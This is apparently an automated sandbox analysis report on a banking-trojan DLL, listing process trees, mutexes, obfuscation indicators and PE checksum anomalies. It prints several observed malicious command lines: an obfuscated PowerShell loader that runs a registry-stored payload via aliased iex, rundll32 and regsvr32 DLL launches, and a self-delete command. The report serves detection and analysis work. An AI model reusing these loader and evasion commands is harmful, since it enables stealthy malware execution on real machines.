Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sjfy431f.cmdline
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oyq1c2cj.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEEEB.tmp" "c:\Users\user\AppData\Local\Temp\CSCA98C8C663682422BB3F042EAAC3AA5FC.TMP"
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF563.tmp" "c:\Users\user\AppData\Local\Temp\CSC8BAF1FC523B466D86EA8211DF896A.TMP"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ugg3o5nf.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tpt0a0ul.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEA8.tmp" "c:\Users\user\AppData\Local\Temp\CSC38F7C9333840429F8E926B6BB254946E.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES105D.tmp" "c:\Users\user\AppData\Local\Temp\CSC2A73DB97C702412EB695E62356797BBE.TMP"
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0hsihch1.cmdline
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oeprcmty.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2E65.tmp" "c:\Users\user\AppData\Local\Temp\CSC7E62D986CCD14293A1B1D71B70775B41.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3848.tmp" "c:\Users\user\AppData\Local\Temp\CSCCBF2AAC487274BF4B5441EA2B445AE92.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pqvogmwc.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pwlcj2cu.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4A3A.tmp" "c:\Users\user\AppData\Local\Temp\CSC176C1CB9788E4426ACAF7B271AB13B4.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4C6C.tmp" "c:\Users\user\AppData\Local\Temp\CSC1CA052A85412AB8DCD9B872B5234E.TMP"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\61f113091fd0c.dll
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\61f113091fd0c.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\61f113091fd0c.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\61f113091fd0c.dll,DllRegisterServer	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\61f113091fd0c.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tpt0a0ul.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pwlcj2cu.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ugg3o5nf.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pqvogmwc.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sjfy431f.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0hsihch1.cmdline
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name gpcceqbj -value gp; new-alias -name qlrwbeixf -value iex; qlrwbeixf ([System.Text.Encoding]::ASCII.GetString((gpcceqbj "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oyq1c2cj.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oeprcmty.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEEEB.tmp" "c:\Users\user\AppData\Local\Temp\CSCA98C8C663682422BB3F042EAAC3AA5FC.TMP"
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF563.tmp" "c:\Users\user\AppData\Local\Temp\CSC8BAF1FC523B466D86EA8211DF896A.TMP"
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEA8.tmp" "c:\Users\user\AppData\Local\Temp\CSC38F7C9333840429F8E926B6BB254946E.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES105D.tmp" "c:\Users\user\AppData\Local\Temp\CSC2A73DB97C702412EB695E62356797BBE.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2E65.tmp" "c:\Users\user\AppData\Local\Temp\CSC7E62D986CCD14293A1B1D71B70775B41.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3848.tmp" "c:\Users\user\AppData\Local\Temp\CSCCBF2AAC487274BF4B5441EA2B445AE92.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4A3A.tmp" "c:\Users\user\AppData\Local\Temp\CSC176C1CB9788E4426ACAF7B271AB13B4.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4C6C.tmp" "c:\Users\user\AppData\Local\Temp\CSC1CA052A85412AB8DCD9B872B5234E.TMP"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\61f113091fd0c.dll
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Documents\20220126\PowerShell_transcript.124406.bcfkRUYJ.20220126102824.txt

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_npkgel2o.x34.ps1

Source: classification engine

Classification label: mal100.bank.troj.evad.winDLL@76/57@0/2

Source: C:\Windows\System32\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_01C12130 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

1_2_01C12130

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\61f113091fd0c.dll",#1

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5660:120:WilError_01
Source: C:\Windows\SysWOW64\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{749A14DC-4303-C6CF-6DE8-275AF19C4B2E}
Source: C:\Windows\System32\control.exe	Mutant created: \Sessions\1\BaseNamedObjects\{24E56635-33EE-F65D-DD98-178A614C3B5E}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{D43C1FA8-2382-2681-4D48-07BAD1FC2B8E}
Source: C:\Windows\System32\control.exe	Mutant created: \Sessions\1\BaseNamedObjects\{F4526350-C361-469C-ED68-A7DA711CCBAE}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{D0842125-EF91-8296-F904-93D63D78776A}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{E8190BB2-27B4-5AA3-F19C-4B2EB590AF42}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6216:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{F8CD5B50-F738-EA41-41AC-1BBE05A07FD2}
Source: C:\Windows\SysWOW64\regsvr32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{18963B60-9722-0ADF-E1CC-BBDEA5C01FF2}
Source: C:\Windows\SysWOW64\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{54F96618-A314-A6F1-CDC8-873A517CAB0E}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1284:120:WilError_01
Source: C:\Windows\System32\loaddll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{9C95EA6E-4BB4-2EFD-B590-AF42B9C45396}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4556:120:WilError_01

Source: C:\Windows\System32\loaddll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: 61f113091fd0c.dll

Static file information: File size 1062256 > 1048576

Source:	Binary string: ntdll.pdb source: loaddll32.exe, 00000001.00000003.455695462.0000000004CB0000.00000004.00000800.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.440284992.0000000004CB0000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.454013508.0000000006360000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.435436816.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.429285803.00000000064C0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.439095932.0000000006110000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000001.00000003.455695462.0000000004CB0000.00000004.00000800.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.440284992.0000000004CB0000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.454013508.0000000006360000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.435436816.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.429285803.00000000064C0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.439095932.0000000006110000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_01C17D50 push ecx; ret	1_2_01C17D59
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_01C180BF push ecx; ret	1_2_01C180CF
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00DC06F5 push dword ptr [ebp-00000284h]; ret	1_2_00DC0764
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00DC0880 push dword ptr [ebp-00000284h]; ret	1_2_00DC08B6
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00DC0AB8 push edx; ret	1_2_00DC0B11
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00DC0A64 push edx; ret	1_2_00DC0B11
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00DC0A64 push dword ptr [esp+10h]; ret	1_2_00DC0BFB
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00DC05DF push dword ptr [ebp-00000284h]; ret	1_2_00DC087F
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00DC0BFC push dword ptr [esp+0Ch]; ret	1_2_00DC0C10
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00DC0BFC push dword ptr [esp+10h]; ret	1_2_00DC0C56
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046E7347 push ecx; ret	1_2_046E7357
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_031F7D50 push ecx; ret	3_2_031F7D59
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_031F80BF push ecx; ret	3_2_031F80CF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BE6DD0 push ecx; ret	3_2_04BE6DD9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BE7347 push ecx; ret	3_2_04BE7357
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_011205DF push dword ptr [ebp-00000284h]; ret	4_2_0112087F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_01120880 push dword ptr [ebp-00000284h]; ret	4_2_011208B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_011206F5 push dword ptr [ebp-00000284h]; ret	4_2_01120764
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_01120AB8 push edx; ret	4_2_01120B11
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_01120BFC push dword ptr [esp+0Ch]; ret	4_2_01120C10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_01120BFC push dword ptr [esp+10h]; ret	4_2_01120C56
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_01120A64 push edx; ret	4_2_01120B11
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_01120A64 push dword ptr [esp+10h]; ret	4_2_01120BFB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EC7347 push ecx; ret	4_2_05EC7357
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_01057D50 push ecx; ret	5_2_01057D59
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_010580BF push ecx; ret	5_2_010580CF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00EB06F5 push dword ptr [ebp-00000284h]; ret	5_2_00EB0764
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00EB0AB8 push edx; ret	5_2_00EB0B11
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00EB0880 push dword ptr [ebp-00000284h]; ret	5_2_00EB08B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00EB0A64 push edx; ret	5_2_00EB0B11
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00EB0A64 push dword ptr [esp+10h]; ret	5_2_00EB0BFB

Contains functionality to dynamically determine API calls

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_046D653E LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_046D653E

PE file contains an invalid checksum

Source: sjfy431f.dll.25.dr	Static PE information: real checksum: 0x0 should be: 0x5cc9
Source: 61f113091fd0c.dll	Static PE information: real checksum: 0x10f3d0 should be: 0x103870
Source: tpt0a0ul.dll.34.dr	Static PE information: real checksum: 0x0 should be: 0x3700
Source: oyq1c2cj.dll.27.dr	Static PE information: real checksum: 0x0 should be: 0xd902
Source: pwlcj2cu.dll.46.dr	Static PE information: real checksum: 0x0 should be: 0xd21c
Source: pqvogmwc.dll.45.dr	Static PE information: real checksum: 0x0 should be: 0x217c
Source: oeprcmty.dll.41.dr	Static PE information: real checksum: 0x0 should be: 0x740b
Source: ugg3o5nf.dll.33.dr	Static PE information: real checksum: 0x0 should be: 0x6d4b
Source: 0hsihch1.dll.39.dr	Static PE information: real checksum: 0x0 should be: 0x34a3

Registers a DLL

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\61f113091fd0c.dll

Compiles C# or VB.Net code

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sjfy431f.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oyq1c2cj.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ugg3o5nf.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tpt0a0ul.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0hsihch1.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oeprcmty.cmdline
